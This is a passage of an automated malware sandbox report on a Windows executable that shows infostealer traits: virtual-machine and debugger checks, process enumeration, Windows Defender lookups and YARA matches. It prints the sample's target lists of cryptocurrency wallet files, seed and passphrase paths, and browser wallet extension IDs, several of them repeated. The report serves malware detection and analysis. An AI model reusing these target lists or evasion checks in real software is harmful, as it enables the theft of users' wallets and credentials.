Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp, z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW~d
Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00417B4E
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00416240
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00415DC0 mov eax, dword ptr fs:[00000030h] 0_2_00415DC0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00404C70
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00419DC7 SetUnhandledExceptionFilter, 0_2_00419DC7
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00417B4E
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004173DD
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF9B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6CF9B66C
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF9B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CF9B1F7
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D14AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6D14AC62

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00415D00
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6D194760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 0_2_6D194760
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF9B341 cpuid 0_2_6CF9B341
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00414570
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00414450 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 0_2_00414450
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_004143C0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_004144B0
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Source: Yara match File source: 0.2.z2kQkLtyJW.exe.2b20e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z2kQkLtyJW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z2kQkLtyJW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z2kQkLtyJW.exe.2b20e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.z2kQkLtyJW.exe.2c50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1965368943.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2268391643.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2269571809.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2269753162.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z2kQkLtyJW.exe PID: 3756, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.z2kQkLtyJW.exe.2b20e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z2kQkLtyJW.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z2kQkLtyJW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z2kQkLtyJW.exe.2b20e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.z2kQkLtyJW.exe.2c50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1965368943.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2268391643.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2269571809.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z2kQkLtyJW.exe PID: 3756, type: MEMORYSTR
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MetaMask|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|Binance Wallet|fhbohimaelbohpjbbldcngcnapndodjp|1|0|0|Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase Wallet extension|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|0|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|1|0|0|iWallet|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|1|0|0|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|1|0|0|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra Station Wallet|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|1|0|0|Auro Wallet(Mina Protocol)|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98 Wallet|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain Wallet|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Brave Wallet|odbfpeeihdkbihmopkbjmoonfanlbfcl|1|0|0|Oxygen|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|Pali Wallet|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|BOLT X|aodkkagnadcbobfpggfnjeongemjbjca|1|0|0|XDEFI Wallet|hmeobnfnfcmdkdcmlblgagmfpfboieaf|1|0|0|Nami|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Maiar DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Keeper Wallet|lpilbniiabackdjcionkobglmddfbcjo|1|0|0|Solflare Wallet|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc|1|0|0|Goby|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|Ronin Wallet|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd|1|0|0|OneKey|jnmbobjmhlngoefaiojfljckilhhlhcj|1|0|0|DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik|1|0|0|SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid|1|0|0|Braavos Wallet|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|kkpllkodjeloidieedojogacfhpaihoh|1|1|1|OKX Wallet|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender Wallet|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|Eternl|kmhcihpebfmpgmihbkipmjlmmioameka|1|0|0|Pontem Aptos Wallet|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Petra Aptos Wallet|ejjladinnckdgjemekebdpeokbikhfci|1|0|0|Martian Aptos Wallet|efbglgofoippbgcjepnhiblaibcnclgk|1|0|0|Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra Wallet|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk|1|0|0|Authenticator|bhghoamapcdpbohphigoooaddinpkbai|1|0|0|
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
